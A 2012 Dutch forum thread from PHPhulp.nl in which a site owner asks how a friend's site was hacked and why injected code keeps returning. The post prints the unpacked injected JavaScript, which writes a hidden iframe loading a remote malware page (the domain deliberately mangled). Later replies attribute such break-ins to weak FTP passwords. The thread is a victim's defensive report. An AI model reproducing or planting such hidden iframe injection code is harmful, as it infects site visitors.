PHPhulp.nl
35k+ leden Over PHPhulp Offerte opdracht Contact
A

Gehacked? Script of server

Door Alex Hakkenberg op 15-02-2012 20:17 gewijzigd op 15-02-2012 21:02
2.819 views
Goedenavond,

Vanavond ben ik in paniek gebeld door een vriend. Zijn site gaf een virus melding....
Even kijken.
En inderdaad een hele leuke foutmelding.:


Als ik in de code kijk zie ik:


Nu ik die code verwijderen. En helaas een twee uur later staat dezelfde code er weer in.

Ik vraag mij nu dus twee dingen af. Zit er één of ander script op dat kijkt of ze er nog in zit? (de code) of is dat één of ander kind wat leuk bijverdient in een heel arm land?

Ten tweede.. Hoe is hij gehacked? Is het de server zelf of is dit gewoon gebruik maken van een lek in het CMS systeem?

Bij voorbaat dank

[size=xsmall]Toevoeging op 15/02/2012 20:20:06:[/size]

Als ik met Javascript unpacker het scriptje bekijk komt er dit uit:

//eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);} //document.write (s) <iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var ss = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://storyl(DIT IS TER VEILIGHEID VERMINKT)ootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
A
Alex Hakkenberg
16-02-2012 17:39
Nou bij ons zijn ze binnengekomen via de FTP. Een te zwak wachtwoord.
Inmiddels zijn ook alle wachtwoorden vervangen.

Dus ik verwacht niet het contact form.
K
Koekjes Bakker
16-02-2012 18:37
Oke bedankt, ik had de logs niet aan voor mijn FTP server hellaas, nu wel, en ik had een zwak wachtwoord op een FTP account, deze heb ik gewijzigt natuurlijk na het contanteren van de "hack".

Bedankt voor de reacties!
J
Jip van Kakerken
16-02-2012 18:45
Mijn ftp login is zo random als het maar zijn kan.
En daarbij komt dat de 2 sites die gehackt zijn op 2 andere servers stonden.
Dat is ook nog eens heel erg vreemd.

Reageren

Inloggen om te reageren